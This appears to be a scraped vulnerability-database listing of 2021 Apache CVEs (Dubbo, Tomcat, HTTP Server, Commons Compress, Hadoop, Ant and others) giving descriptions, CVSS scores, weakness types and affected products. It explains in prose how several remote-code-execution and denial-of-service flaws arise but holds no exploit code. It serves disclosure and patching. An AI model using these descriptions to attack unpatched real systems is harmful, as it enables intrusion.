Apache Dubbo is a java based, open source RPC framework. Versions prior to 2.6.10 and 2.7.10 are vulnerable to pre-auth remote code execution via arbitrary bean manipulation in the Telnet handler. The Dubbo main service port can be used to access a Telnet Handler which offers some basic methods to collect information about the providers and methods exposed by the service and it can even allow to shutdown the service. This endpoint is unprotected. Additionally, a provider method can be invoked using the `invoke` handler. This handler uses a safe version of FastJson to process the call arguments. However, the resulting list is later processed with `PojoUtils.realize` which can be used to instantiate arbitrary classes and invoke its setters. Even though FastJson is properly protected with a default blocklist, `PojoUtils.realize` is not, and an attacker can leverage that to achieve remote code execution. Versions 2.6.10 and 2.7.10 contain fixes for this issue.

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-33035 MEDIUM

Apache OpenOffice opens dBase/DBF documents and shows the contents as spreadsheets. DBF are database files with data organized in fields. When reading DBF data the size of certain fields is not checked: the data is just copied into local variables. A carefully crafted document could overflow the allocated space, leading to the execution of arbitrary code by altering the contents of the program stack. This issue affects Apache OpenOffice up to and including version 4.1.10

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 1.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-120,CWE-120,

Products Affected

Vendor Product Version
apache openoffice *
CVE-2021-33036 HIGH

In Apache Hadoop 2.2.0 to 2.10.1, 3.0.0-alpha1 to 3.1.4, 3.2.0 to 3.2.2, and 3.3.0 to 3.3.1, a user who can escalate to yarn user can possibly run arbitrary commands as root user. Users should upgrade to Apache Hadoop 2.10.2, 3.2.3, 3.3.2 or higher.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-24,CWE-264,CWE-22,

Products Affected

Vendor Product Version
apache hadoop *
apache hadoop 3.0.0
CVE-2021-33037 MEDIUM

Apache Tomcat 10.0.0-M1 to 10.0.6, 9.0.0.M1 to 9.0.46 and 8.5.0 to 8.5.66 did not correctly parse the HTTP transfer-encoding request header in some circumstances leading to the possibility to request smuggling when used with a reverse proxy. Specifically: - Tomcat incorrectly ignored the transfer encoding header if the client declared it would only accept an HTTP/1.0 response; - Tomcat honoured the identify encoding; and - Tomcat did not ensure that, if present, the chunked encoding was the final encoding.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-444,CWE-444,

Products Affected

Vendor Product Version
oracle communications_policy_management 12.5.0
oracle communications_session_route_manager *
oracle instantis_enterprisetrack 17.1
debian debian_linux 10.0
oracle secure_global_desktop 5.6
oracle communications_diameter_signaling_router *
oracle managed_file_transfer 12.2.1.4.0
oracle communications_instant_messaging_server 10.0.1.5.0
oracle communications_session_report_manager *
apache tomcat *
oracle sd-wan_edge 9.1
oracle utilities_testing_accelerator 6.0.0.2.2
oracle agile_plm 9.3.6
oracle communications_pricing_design_center 12.0.0.3.0
apache tomee 8.0.6
oracle mysql_enterprise_monitor *
oracle instantis_enterprisetrack 17.3
oracle communications_cloud_native_core_policy 1.14.0
oracle graph_server_and_client *
mcafee epolicy_orchestrator *
mcafee epolicy_orchestrator 5.10.0
debian debian_linux 9.0
oracle healthcare_translational_research 4.1.0
oracle sd-wan_edge 9.0
oracle communications_cloud_native_core_service_communication_proxy 1.14.0
oracle utilities_testing_accelerator 6.0.0.3.1
oracle hospitality_cruise_shipboard_property_management_system 20.1.0
oracle managed_file_transfer 12.2.1.3.0
oracle instantis_enterprisetrack 17.2
oracle utilities_testing_accelerator 6.0.0.1.1
CVE-2021-33190 MEDIUM

In Apache APISIX Dashboard version 2.6, we changed the default value of listen host to 0.0.0.0 in order to facilitate users to configure external network access. In the IP allowed list restriction, a risky function was used for the IP acquisition, which made it possible to bypass the network limit. At the same time, the default account and password are fixed.Ultimately these factors lead to the issue of security risks. This issue is fixed in APISIX Dashboard 2.6.1

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-307,CWE-307,

Products Affected

Vendor Product Version
apache apisix_dashboard 2.6
CVE-2021-33191 HIGH

From Apache NiFi MiNiFi C++ version 0.5.0 the c2 protocol implements an "agent-update" command which was designed to patch the application binary. This "patching" command defaults to calling a trusted binary, but might be modified to an arbitrary value through a "c2-update" command. Said command is then executed using the same privileges as the application binary. This was addressed in version 0.10.0

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-78,CWE-78,

Products Affected

Vendor Product Version
apache nifi_minifi_c++ *
CVE-2021-33192 MEDIUM

A vulnerability in the HTML pages of Apache Jena Fuseki allows an attacker to execute arbitrary javascript on certain page views. This issue affects Apache Jena Fuseki from version 2.0.0 to version 4.0.0 (inclusive).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 6.1 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 2.8 2.7

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-79,

Products Affected

Vendor Product Version
apache jena_fuseki *
CVE-2021-33193 MEDIUM

A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-Other,

Products Affected

Vendor Product Version
fedoraproject fedora 35
apache http_server *
fedoraproject fedora 34
oracle secure_backup *
tenable tenable.sc *
oracle zfs_storage_appliance_kit 8.8
debian debian_linux 10.0
CVE-2021-33580 MEDIUM

User controlled `request.getHeader("Referer")`, `request.getRequestURL()` and `request.getQueryString()` are used to build and run a regex expression. The attacker doesn't have to use a browser and may send a specially crafted Referer header programmatically. Since the attacker controls the string and the regex pattern he may cause a ReDoS by regex catastrophic backtracking on the server side. This problem has been fixed in Roller 6.0.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,CWE-400,

Products Affected

Vendor Product Version
apache roller *
CVE-2021-33813 MEDIUM

An XXE issue in SAXBuilder in JDOM through 2.0.6 allows attackers to cause a denial of service via a crafted HTTP request.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-611,

Products Affected

Vendor Product Version
fedoraproject fedora 35
debian debian_linux 9.0
apache solr 8.8.1
apache solr 8.9
oracle communications_messaging_server 8.1
apache tika 1.25
jdom jdom *
CVE-2021-33900 MEDIUM

While investigating DIRSTUDIO-1219 it was noticed that configured StartTLS encryption was not applied when any SASL authentication mechanism (DIGEST-MD5, GSSAPI) was used. While investigating DIRSTUDIO-1220 it was noticed that any configured SASL confidentiality layer was not applied. This issue affects Apache Directory Studio version 2.0.0.v20210213-M16 and prior versions.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-311,CWE-319,

Products Affected

Vendor Product Version
apache directory_studio 2.0.0
apache directory_studio *
CVE-2021-34538

Apache Hive before 3.1.3 "CREATE" and "DROP" function operations does not check for necessary authorization of involved entities in the query. It was found that an unauthorized user can manipulate an existing UDF without having the privileges to do so. This allowed unauthorized or underprivileged users to drop and recreate UDFs pointing them to new jars that could be potentially malicious.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N 3.9 3.6

Products Affected

Vendor Product Version
apache hive *
CVE-2021-34797 MEDIUM

Apache Geode versions up to 1.12.4 and 1.13.4 are vulnerable to a log file redaction of sensitive information flaw when using values that begin with characters other than letters or numbers for passwords and security properties with the prefix "sysprop-", "javax.net.ssl", or "security-". This issue is fixed by overhauling the log file redaction in Apache Geode versions 1.12.5, 1.13.5, and 1.14.0.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-532,CWE-532,

Products Affected

Vendor Product Version
apache geode *
CVE-2021-34798 MEDIUM

Malformed requests may cause the server to dereference a NULL pointer. This issue affects Apache HTTP Server 2.4.48 and earlier.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,CWE-476,

Products Affected

Vendor Product Version
apache http_server *
siemens sinema_server 14.0
oracle enterprise_manager_base_platform 13.4.0.0
oracle http_server 12.2.1.4.0
oracle instantis_enterprisetrack 17.1
debian debian_linux 10.0
netapp clustered_data_ontap -
oracle enterprise_manager_base_platform 13.5.0.0
fedoraproject fedora 35
netapp cloud_backup -
fedoraproject fedora 34
oracle peoplesoft_enterprise_peopletools 8.58
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.3
broadcom brocade_fabric_operating_system_firmware -
netapp storagegrid -
siemens sinema_remote_connect_server *
oracle http_server 12.2.1.3.0
debian debian_linux 9.0
oracle communications_cloud_native_core_network_function_cloud_native_environment 1.10.0
siemens sinec_nms *
siemens ruggedcom_nms *
debian debian_linux 11.0
tenable tenable.sc *
oracle instantis_enterprisetrack 17.2
CVE-2021-35474 HIGH

Stack-based Buffer Overflow vulnerability in cachekey plugin of Apache Traffic Server. This issue affects Apache Traffic Server 7.0.0 to 7.1.12, 8.0.0 to 8.1.1, 9.0.0 to 9.0.1.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-121,CWE-787,

Products Affected

Vendor Product Version
debian debian_linux 10.0
apache traffic_server *
CVE-2021-35515 MEDIUM

When reading a specially crafted 7Z archive, the construction of the list of codecs that decompress an entry can result in an infinite loop. This could be used to mount a denial of service attack against services that use Compress' sevenz package.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-834,CWE-835,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle insurance_policy_administration 11.0.2
oracle business_process_management_suite 12.2.1.3.0
oracle communications_session_route_manager *
oracle commerce_guided_search 11.3.2
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
oracle insurance_policy_administration 11.1.0
oracle flexcube_universal_banking *
oracle financial_services_enterprise_case_management 8.0.8.1.0
apache commons_compress *
oracle banking_party_management 2.7.0
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
oracle banking_trade_finance 14.5
oracle banking_digital_experience 20.1
oracle peoplesoft_enterprise_peopletools 8.58
oracle insurance_policy_administration 11.2.8
netapp oncommand_insight -
oracle utilities_testing_accelerator 6.0.0.2.2
oracle primavera_unifier *
oracle communications_diameter_intelligence_hub *
oracle banking_digital_experience 19.1
oracle insurance_policy_administration 11.3.0
oracle communications_cloud_native_core_unified_data_repository 1.14.0
oracle peoplesoft_enterprise_peopletools 8.57
oracle healthcare_data_repository 8.1.0
oracle banking_digital_experience 21.1
oracle financial_services_enterprise_case_management 8.0.7.2.0
oracle primavera_unifier 20.12
oracle banking_enterprise_default_management 2.7.0
oracle banking_payments 14.5
oracle banking_digital_experience *
oracle primavera_unifier 18.8
oracle flexcube_universal_banking 14.5.0
oracle flexcube_universal_banking 12.4.0
oracle communications_billing_and_revenue_management 12.0.0.4
oracle banking_treasury_management 14.5
oracle communications_cloud_native_core_service_communication_proxy 1.14.0
oracle business_process_management_suite 12.2.1.4.0
netapp active_iq_unified_manager -
oracle primavera_unifier 19.12
oracle utilities_testing_accelerator 6.0.0.3.1
oracle communications_cloud_native_core_automated_test_suite 1.8.0
oracle communications_messaging_server 8.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle insurance_policy_administration 11.3.1
CVE-2021-35516 MEDIUM

When reading a specially crafted 7Z archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' sevenz package.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-130,CWE-770,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle insurance_policy_administration 11.0.2
oracle business_process_management_suite 12.2.1.3.0
oracle communications_session_route_manager *
oracle commerce_guided_search 11.3.2
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
oracle insurance_policy_administration 11.1.0
oracle flexcube_universal_banking *
oracle financial_services_enterprise_case_management 8.0.8.1.0
apache commons_compress *
oracle flexcube_universal_banking 14.5
oracle banking_party_management 2.7.0
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
oracle banking_digital_experience 20.1
oracle peoplesoft_enterprise_peopletools 8.58
oracle insurance_policy_administration 11.2.8
netapp oncommand_insight -
oracle utilities_testing_accelerator 6.0.0.2.2
oracle primavera_unifier *
oracle communications_diameter_intelligence_hub *
oracle banking_digital_experience 19.1
oracle insurance_policy_administration 11.3.0
oracle communications_cloud_native_core_unified_data_repository 1.14.0
oracle peoplesoft_enterprise_peopletools 8.57
oracle healthcare_data_repository 8.1.0
oracle banking_digital_experience 21.1
oracle financial_services_enterprise_case_management 8.0.7.2.0
oracle primavera_unifier 20.12
oracle banking_enterprise_default_management 2.7.0
oracle webcenter_portal 12.2.1.3.0
oracle banking_digital_experience *
oracle primavera_unifier 18.8
oracle webcenter_portal 12.2.1.4.0
oracle banking_digital_experience 19.2
oracle flexcube_universal_banking 12.4.0
oracle communications_billing_and_revenue_management 12.0.0.4
oracle communications_cloud_native_core_service_communication_proxy 1.14.0
oracle business_process_management_suite 12.2.1.4.0
netapp active_iq_unified_manager -
oracle primavera_unifier 19.12
oracle utilities_testing_accelerator 6.0.0.3.1
oracle communications_cloud_native_core_automated_test_suite 1.8.0
oracle communications_messaging_server 8.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle insurance_policy_administration 11.3.1
CVE-2021-35517 MEDIUM

When reading a specially crafted TAR archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' tar package.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-130,CWE-770,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle business_process_management_suite 12.2.1.3.0
oracle insurance_policy_administration 11.1.0
oracle financial_services_enterprise_case_management 8.0.8.1.0
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
oracle banking_trade_finance 14.5
oracle banking_digital_experience 20.1
oracle insurance_policy_administration 11.2.8
oracle primavera_unifier *
oracle banking_digital_experience 19.1
oracle communications_cloud_native_core_unified_data_repository 1.14.0
oracle peoplesoft_enterprise_peopletools 8.57
oracle financial_services_enterprise_case_management 8.0.7.2.0
oracle banking_payments 14.5
oracle webcenter_portal 12.2.1.3.0
oracle banking_digital_experience *
oracle primavera_unifier 18.8
oracle webcenter_portal 12.2.1.4.0
oracle banking_digital_experience 19.2
oracle banking_apis *
oracle banking_treasury_management 14.5
oracle primavera_unifier 19.12
oracle utilities_testing_accelerator 6.0.0.3.1
oracle banking_apis 19.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle banking_apis 20.1
oracle insurance_policy_administration 11.3.1
oracle insurance_policy_administration 11.0.2
oracle communications_session_route_manager *
oracle commerce_guided_search 11.3.2
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
oracle banking_apis 21.1
oracle flexcube_universal_banking *
apache commons_compress *
oracle flexcube_universal_banking 14.5
oracle banking_party_management 2.7.0
oracle flexcube_universal_banking 12.4
oracle peoplesoft_enterprise_peopletools 8.58
netapp oncommand_insight -
oracle utilities_testing_accelerator 6.0.0.2.2
oracle communications_diameter_intelligence_hub *
oracle insurance_policy_administration 11.3.0
oracle healthcare_data_repository 8.1.0
oracle banking_digital_experience 21.1
oracle primavera_unifier 20.12
oracle banking_enterprise_default_management 2.7.0
oracle communications_billing_and_revenue_management 12.0.0.4
oracle communications_cloud_native_core_service_communication_proxy 1.14.0
oracle business_process_management_suite 12.2.1.4.0
netapp active_iq_unified_manager -
oracle banking_apis 19.2
oracle communications_messaging_server 8.1
CVE-2021-35936 MEDIUM

If remote logging is not used, the worker (in the case of CeleryExecutor) or the scheduler (in the case of LocalExecutor) runs a Flask logging server and is listening on a specific port and also binds on 0.0.0.0 by default. This logging server had no authentication and allows reading log files of DAG jobs. This issue affects Apache Airflow < 2.1.2.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.3 MEDIUM CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N 3.9 1.4

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,CWE-306,

Products Affected

Vendor Product Version
apache airflow *
CVE-2021-35940 LOW

An out-of-bounds array read in the apr_time_exp*() functions was fixed in the Apache Portable Runtime 1.6.3 release (CVE-2017-12613). The fix for this issue was not carried forward to the APR 1.7.x branch, and hence version 1.7.0 regressed compared to 1.6.3 and is vulnerable to the same issue.

CVSS 2.0

Severity: LOW

Problem Type: CWE-125,

Products Affected

Vendor Product Version
oracle http_server 12.2.1.3.0
oracle http_server 12.2.1.4.0
apache portable_runtime 1.7.0
CVE-2021-36090 MEDIUM

When reading a specially crafted ZIP archive, Compress can be made to allocate large amounts of memory that finally leads to an out of memory error even for very small inputs. This could be used to mount a denial of service attack against services that use Compress' zip package.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-130,NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle peoplesoft_enterprise_peopletools 8.59
oracle business_process_management_suite 12.2.1.3.0
oracle communications_unified_inventory_management 7.4.2
oracle insurance_policy_administration 11.1.0
oracle financial_services_enterprise_case_management 8.0.8.1.0
oracle communications_unified_inventory_management 7.4.0
oracle financial_services_crime_and_compliance_management_studio 8.0.8.3.0
oracle primavera_gateway *
oracle banking_trade_finance 14.5
oracle banking_digital_experience 20.1
oracle insurance_policy_administration 11.2.8
oracle communications_unified_inventory_management 7.5.0
oracle primavera_unifier *
oracle banking_digital_experience 19.1
oracle communications_diameter_intelligence_hub 8.2.3
oracle communications_cloud_native_core_unified_data_repository 1.14.0
oracle peoplesoft_enterprise_peopletools 8.57
oracle financial_services_enterprise_case_management 8.0.7.2.0
oracle banking_payments 14.5
oracle webcenter_portal 12.2.1.3.0
oracle banking_digital_experience *
oracle primavera_unifier 18.8
oracle webcenter_portal 12.2.1.4.0
oracle banking_digital_experience 19.2
oracle banking_apis *
oracle banking_treasury_management 14.5
oracle primavera_unifier 19.12
oracle utilities_testing_accelerator 6.0.0.3.1
oracle banking_apis 19.1
oracle banking_platform 2.9.0
oracle banking_platform 2.6.2
oracle banking_platform 2.7.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle banking_apis 20.1
oracle insurance_policy_administration 11.3.1
oracle insurance_policy_administration 11.0.2
oracle communications_session_route_manager *
oracle commerce_guided_search 11.3.2
oracle financial_services_enterprise_case_management *
oracle financial_services_crime_and_compliance_management_studio 8.0.8.2.0
oracle financial_services_analytical_applications_infrastructure *
oracle banking_apis 21.1
oracle flexcube_universal_banking *
apache commons_compress *
oracle flexcube_universal_banking 14.5
oracle banking_party_management 2.7.0
oracle flexcube_universal_banking 12.4
oracle communications_unified_inventory_management 7.4.1
oracle communications_session_report_manager *
oracle peoplesoft_enterprise_peopletools 8.58
netapp oncommand_insight -
oracle utilities_testing_accelerator 6.0.0.2.2
oracle banking_platform 2.12.0
oracle communications_diameter_intelligence_hub *
oracle communications_element_manager *
oracle insurance_policy_administration 11.3.0
oracle healthcare_data_repository 8.1.0
oracle banking_digital_experience 21.1
oracle primavera_unifier 20.12
oracle banking_enterprise_default_management 2.7.0
oracle communications_billing_and_revenue_management 12.0.0.4
oracle communications_cloud_native_core_service_communication_proxy 1.14.0
oracle business_process_management_suite 12.2.1.4.0
netapp active_iq_unified_manager -
oracle banking_apis 19.2
oracle communications_cloud_native_core_automated_test_suite 1.8.0
oracle communications_messaging_server 8.1
CVE-2021-36151 LOW

In Apache Gobblin, the Hadoop token is written to a temp file that is visible to all local users on Unix-like systems. This affects versions <= 0.15.0. Users should update to version 0.16.0 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N 1.8 3.6

CVSS 2.0

Severity: LOW

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache gobblin *
CVE-2021-36152 HIGH

Apache Gobblin trusts all certificates used for LDAP connections in Gobblin-as-a-Service. This affects versions <= 0.15.0. Users should update to version 0.16.0 which addresses this issue.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache gobblin *
CVE-2021-36160 MEDIUM

A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive).

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-125,CWE-125,

Products Affected

Vendor Product Version
apache http_server *
oracle http_server 12.2.1.3.0
oracle enterprise_manager_base_platform 13.4.0.0
oracle http_server 12.2.1.4.0
debian debian_linux 9.0
oracle instantis_enterprisetrack 17.1
oracle communications_cloud_native_core_network_function_cloud_native_environment 1.10.0
debian debian_linux 10.0
debian debian_linux 11.0
netapp clustered_data_ontap -
oracle enterprise_manager_base_platform 13.5.0.0
fedoraproject fedora 35
netapp cloud_backup -
fedoraproject fedora 34
oracle peoplesoft_enterprise_peopletools 8.58
oracle zfs_storage_appliance_kit 8.8
oracle instantis_enterprisetrack 17.2
oracle instantis_enterprisetrack 17.3
broadcom brocade_fabric_operating_system_firmware -
netapp storagegrid -
CVE-2021-36161 HIGH

Some component in Dubbo will try to print the formated string of the input arguments, which will possibly cause RCE for a maliciously customized bean with special toString method. In the latest version, we fix the toString call in timeout, cache and some other places. Fixed in Apache Dubbo 2.7.13

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-134,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-36162 MEDIUM

Apache Dubbo supports various rules to support configuration override or traffic routing (called routing in Dubbo). These rules are loaded into the configuration center (eg: Zookeeper, Nacos, ...) and retrieved by the customers when making a request in order to find the right endpoint. When parsing these YAML rules, Dubbo customers will use SnakeYAML library to load the rules which by default will enable calling arbitrary constructors. An attacker with access to the configuration center he will be able to poison the rule so when retrieved by the consumers, it will get RCE on all of them. This was fixed in Dubbo 2.7.13, 3.0.2

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 2.8 5.9

CVSS 2.0

Severity: MEDIUM

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-36163 HIGH

In Apache Dubbo, users may choose to use the Hessian protocol. The Hessian protocol is implemented on top of HTTP and passes the body of a POST request directly to a HessianSkeleton: New HessianSkeleton are created without any configuration of the serialization factory and therefore without applying the dubbo properties for applying allowed or blocked type lists. In addition, the generic service is always exposed and therefore attackers do not need to figure out a valid service/method name pair. This is fixed in 2.7.13, 2.6.10.1

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-502,

Products Affected

Vendor Product Version
apache dubbo *
CVE-2021-36372 HIGH

In Apache Ozone versions prior to 1.2.0, Initially generated block tokens are persisted to the metadata database and can be retrieved with authenticated users with permission to the key. Authenticated users may use them even after access is revoked.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 9.8 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 3.9 5.9

CVSS 2.0

Severity: HIGH

Problem Type: CWE-273,CWE-273,

Products Affected

Vendor Product Version
apache ozone *
CVE-2021-36373 MEDIUM

When reading a specially crafted TAR archive an Apache Ant build can be made to allocate large amounts of memory that finally leads to an out of memory error, even for small inputs. This can be used to disrupt builds using Apache Ant. Apache Ant prior to 1.9.16 and 1.10.11 were affected.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 5.5 MEDIUM CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H 1.8 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-130,NVD-CWE-Other,

Products Affected

Vendor Product Version
oracle retail_financial_integration 16.0.3.0
oracle communications_unified_inventory_management 7.4.2
oracle real-time_decision_server 3.2.0.0
oracle retail_eftlink 19.0.1
oracle communications_unified_inventory_management 7.4.0
oracle retail_financial_integration 15.0.4.0
oracle communications_cloud_native_core_automated_test_suite 1.9.0
oracle retail_bulk_data_integration 19.0.1
oracle utilities_framework 4.4.0.0.0
oracle retail_bulk_data_integration 16.0.3.0
oracle retail_eftlink 20.0.1
oracle retail_central_office 14.1
oracle primavera_gateway *
oracle retail_xstore_point_of_service 20.0.1
oracle banking_trade_finance 14.5
oracle retail_store_inventory_management 16.0
oracle agile_plm 9.3.6
oracle communications_unified_inventory_management 7.5.0
oracle primavera_unifier *
oracle utilities_framework 4.2.0.3.0
oracle retail_xstore_point_of_service 18.0.3
oracle retail_integration_bus 19.0.1.0
oracle retail_xstore_point_of_service 16.0.6
oracle retail_merchandising_system 19.0.1
oracle insurance_policy_administration *
oracle retail_advanced_inventory_planning 14.1
oracle primavera_unifier 18.8
oracle retail_xstore_point_of_service 17.0.4
oracle retail_back_office 14.0
oracle retail_point-of-service 14.0
oracle retail_invoice_matching 16.0.3
oracle banking_treasury_management 14.5
oracle retail_extract_transform_and_load 13.2.8
oracle retail_predictive_application_server 16.0.3.0
oracle retail_central_office 14.0
oracle primavera_unifier 19.12
oracle retail_advanced_inventory_planning 16.0
oracle retail_advanced_inventory_planning 15.0
oracle utilities_framework 4.2.0.2.0
oracle communications_order_and_service_management 7.3
oracle retail_store_inventory_management 14.1
oracle retail_back_office 14.1
oracle utilities_testing_accelerator 6.0.0.1.1
oracle utilities_framework 4.4.0.2.0
oracle retail_financial_integration 14.1.3.2
oracle retail_integration_bus 16.0.3.0
oracle enterprise_repository 11.1.1.7.0
oracle timesten_in-memory_database *
oracle financial_services_analytical_applications_infrastructure *
oracle communications_order_and_service_management 7.4
oracle communications_unified_inventory_management 7.3.0
apache ant *
oracle retail_integration_bus 14.1.3.2
oracle retail_service_backbone 16.0.3.0
oracle communications_unified_inventory_management 7.4.1
oracle retail_predictive_application_server 14.1.3
oracle utilities_framework *
oracle retail_store_inventory_management 15.0
oracle retail_service_backbone 15.0.4.0
oracle real-time_decision_server 11.1.1.9.0
oracle primavera_unifier 20.12
